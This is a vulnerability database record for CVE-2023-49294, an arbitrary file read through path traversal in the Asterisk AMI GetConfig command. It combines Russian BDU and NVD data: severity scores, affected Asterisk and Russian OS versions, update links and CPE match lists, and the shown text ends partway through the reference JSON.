Severity


                    
                      AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Vendor

ООО «Ред Софт», Digium, Inc., АО "НППКТ"

Software Name

РЕД ОС (запись в едином реестре российских программ №3751), Asterisk, Certified Asterisk, ОСОН ОСнова Оnyx (запись в едином реестре российских программ №5913)

Software Version

7.3 (РЕД ОС), до 18.20.0 включительно (Asterisk), от 19.8.1 до 20.5.0 включительно (Asterisk), 21.0.0 (Asterisk), до 18.9-cert5 включительно (Certified Asterisk), до 2.10 (ОСОН ОСнова Оnyx)

Possible Mitigations

Использование рекомендаций: https://github.com/asterisk/asterisk/releases https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757 https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5 Для ОСОН ОСнова Оnyx (версия 2.10): Обновление программного обеспечения asterisk до версии 1:18.14.0~dfsg+~cs6.12.40431414-1really16.28.0~dfsg-0+deb10u4 Для РедОС: http://repo.red-soft.ru/redos/7.3c/x86_64/updates/

Reference

https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757 https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5 https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f https://wiki.miko.ru/kb:asterisk:ami:getconfig https://поддержка.нппкт.рф/bin/view/ОСнова/Обновления/2.10/ http://repo.red-soft.ru/redos/7.3c/x86_64/updates/

CWE

CWE-22

JSON

To clipboard

{
  "CVSS 2.0": "AV:N/AC:L/Au:M/C:C/I:N/A:N",
  "CVSS 3.0": "AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  "CVSS 4.0": null,
  "remediation_\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": null,
  "remediation_\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435": null,
  "\u0412\u0435\u043d\u0434\u043e\u0440 \u041f\u041e": "\u041e\u041e\u041e \u00ab\u0420\u0435\u0434 \u0421\u043e\u0444\u0442\u00bb, Digium, Inc., \u0410\u041e \"\u041d\u041f\u041f\u041a\u0422\"",
  "\u0412\u0435\u0440\u0441\u0438\u044f \u041f\u041e": "7.3 (\u0420\u0415\u0414 \u041e\u0421), \u0434\u043e 18.20.0 \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e (Asterisk), \u043e\u0442 19.8.1 \u0434\u043e 20.5.0 \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e (Asterisk), 21.0.0 (Asterisk), \u0434\u043e 18.9-cert5 \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e (Certified Asterisk), \u0434\u043e 2.10 (\u041e\u0421\u041e\u041d \u041e\u0421\u043d\u043e\u0432\u0430 \u041enyx)",
  "\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e": "\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439:\nhttps://github.com/asterisk/asterisk/releases\nhttps://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757\nhttps://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\nhttps://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5\n\n\u0414\u043b\u044f \u041e\u0421\u041e\u041d \u041e\u0421\u043d\u043e\u0432\u0430 \u041enyx (\u0432\u0435\u0440\u0441\u0438\u044f 2.10):\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f asterisk \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 1:18.14.0~dfsg+~cs6.12.40431414-1really16.28.0~dfsg-0+deb10u4\n\n\u0414\u043b\u044f \u0420\u0435\u0434\u041e\u0421: http://repo.red-soft.ru/redos/7.3c/x86_64/updates/",
  "\u0414\u0430\u0442\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f": "14.12.2023",
  "\u0414\u0430\u0442\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f": "12.08.2024",
  "\u0414\u0430\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438": "19.12.2023",
  "\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": "BDU:2023-08871",
  "\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "CVE-2023-49294",
  "\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430",
  "\u041a\u043b\u0430\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0434\u0430",
  "\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u041f\u041e": "\u0420\u0415\u0414 \u041e\u0421 (\u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u0435\u0434\u0438\u043d\u043e\u043c \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u21163751), Asterisk, Certified Asterisk, \u041e\u0421\u041e\u041d \u041e\u0421\u043d\u043e\u0432\u0430 \u041enyx (\u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u0435\u0434\u0438\u043d\u043e\u043c \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u21165913)",
  "\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u041e\u0421 \u0438 \u0442\u0438\u043f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b": "\u041e\u041e\u041e \u00ab\u0420\u0435\u0434 \u0421\u043e\u0444\u0442\u00bb \u0420\u0415\u0414 \u041e\u0421 7.3  (\u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u0435\u0434\u0438\u043d\u043e\u043c \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u21163751), \u0410\u041e \"\u041d\u041f\u041f\u041a\u0422\" \u041e\u0421\u041e\u041d \u041e\u0421\u043d\u043e\u0432\u0430 \u041enyx \u0434\u043e 2.10  (\u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u0435\u0434\u0438\u043d\u043e\u043c \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u21165913)",
  "\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430 AMI (Asterisk Managment Interface) \u0441\u0438\u0441\u0442\u0435\u043c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f IP-\u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0438\u0435\u0439 Asterisk \u0438 Certified Asterisk, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043d\u0430 \u0447\u0442\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432",
  "\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430": "\u0421\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435",
  "\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "\u041d\u0435\u0432\u0435\u0440\u043d\u043e\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0438\u043c\u0435\u043d\u0438 \u043f\u0443\u0442\u0438 \u043a \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0443 \u0441 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u044b\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c (\u00ab\u041e\u0431\u0445\u043e\u0434 \u043f\u0443\u0442\u0438\u00bb) (CWE-22)",
  "\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430 AMI (Asterisk Managment Interface) \u0441\u0438\u0441\u0442\u0435\u043c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f IP-\u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0438\u0435\u0439 Asterisk \u0438 Certified Asterisk \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0432\u0435\u0440\u043d\u044b\u043c \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435\u043c \u0438\u043c\u0435\u043d\u0438 \u043f\u0443\u0442\u0438 \u043a \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0443 \u0441 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u044b\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043d\u0430 \u0447\u0442\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b GetConfig",
  "\u041f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": null,
  "\u041f\u0440\u043e\u0447\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": null,
  "\u0421\u0432\u044f\u0437\u044c \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438 \u0418\u0411": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
  "\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430",
  "\u0421\u043f\u043e\u0441\u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f": "\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
  "\u0421\u043f\u043e\u0441\u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438": "\u041c\u0430\u043d\u0438\u043f\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u043c\u0438",
  "\u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757 \nhttps://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5 \nhttps://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\nhttps://wiki.miko.ru/kb:asterisk:ami:getconfig\nhttps://\u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0430.\u043d\u043f\u043f\u043a\u0442.\u0440\u0444/bin/view/\u041e\u0421\u043d\u043e\u0432\u0430/\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f/2.10/\nhttp://repo.red-soft.ru/redos/7.3c/x86_64/updates/",
  "\u0421\u0442\u0430\u0442\u0443\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c",
  "\u0422\u0438\u043f \u041f\u041e": "\u041e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430, \u0421\u0435\u0442\u0435\u0432\u043e\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e",
  "\u0422\u0438\u043f \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "CWE-22",
  "\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 2.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 6,1)\n\u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 3.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 4,9)"
}

FKIE_CVE-2023-49294

Vulnerability from fkie_nvd - Published: 2023-12-14 20:15 - Updated: 2024-11-21 08:33

Severity

4.9 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757	Product
security-advisories@github.com	https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5	Patch
security-advisories@github.com	https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f	Vendor Advisory
security-advisories@github.com	https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html
af854a3a-2127-422b-91ae-364da2661108	https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	21.0.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A49E9157-3440-47C5-B730-B1F3BE7240C9",
              "versionEndExcluding": "18.20.1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "FCA06EB6-E31A-43B2-A750-186255114B8F",
              "versionEndExcluding": "20.5.1",
              "versionStartIncluding": "19.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3E690E3-3E92-42ED-87DD-1C6B838A3FF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AFE2011-05AA-45A6-A561-65C6C664DA7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "C1117AA4-CE6B-479B-9995-A9F71C430663",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "775041BD-5C86-42B6-8B34-E1D5171B3D87",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "55EC2877-2FF5-4777-B118-E764A94BCE56",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EB0392C9-A5E9-4D71-8B8D-63FB96E055A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "09AF962D-D4BB-40BA-B435-A59E4402931C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "559D1063-7F37-44F8-B5C6-94758B675FDF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "185B2B4B-B246-4379-906B-9BDA7CDD4400",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "73D3592D-3CE5-4462-9FE8-4BCB54E74B5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B3CCE9E0-5DC4-43A2-96DB-9ABEA60EC157",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "1EAD713A-CBA2-40C3-9DE3-5366827F18C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "A5F5A8B7-29C9-403C-9561-7B3E96F9FCA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
              "matchCriteriaId": "F9B96A53-2263-463C-9CCA-0F29865FE500",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
              "matchCriteriaId": "A53049F1-8551-453E-834A-68826A7AA959",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
              "matchCriteriaId": "B224A4E9-4B6B-4187-B0D6-E4BAE2637960",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "9501DBFF-516D-4F26-BBF6-1B453EE2A630",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "9D3E9AC0-C0B4-4E87-8D48-2B688D28B678",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "1A8628F6-F8D1-4C0C-BD89-8E2EEF19A5F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "E27A6FD1-9321-4C9E-B32B-D6330CD3DC92",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "B6BF5EDB-9D17-453D-A22E-FDDC4DCDD85B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "4C75A21E-5D05-434B-93DE-8DAC4DD3E587",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "1D725758-C9F5-4DB2-8C45-CC052518D3FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "B5E2AECC-B681-4EA5-9DE5-2086BB37A5F4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "79EEB5E5-B79E-454B-8DCD-3272BA337A9E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "892BAE5D-A64E-4FE0-9A99-8C07F342A042",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "1A716A45-7075-4CA6-9EF5-2DD088248A5C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "80EFA05B-E22D-49CE-BDD6-5C7123F1C12B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "20FD475F-2B46-47C9-B535-1561E29CB7A1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
    },
    {
      "lang": "es",
      "value": "Asterisk es un conjunto de herramientas de telefon\u00eda y centralita privada de c\u00f3digo abierto. En Asterisk anterior a las versiones 18.20.1, 20.5.1 y 21.0.1, as\u00ed como en Certified-Asterisco anterior a 18.9-cert6, es posible leer cualquier archivo arbitrario incluso cuando `live_dangerfully` no est\u00e1 habilitado. Esto permite leer archivos arbitrarios. Las versiones de Asterisk 18.20.1, 20.5.1 y 21.0.1, as\u00ed como el asterisco certificado anterior a 18.9-cert6, contienen una soluci\u00f3n para este problema."
    }
  ],
  "id": "CVE-2023-49294",
  "lastModified": "2024-11-21T08:33:12.447",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.9,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-12-14T20:15:52.730",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
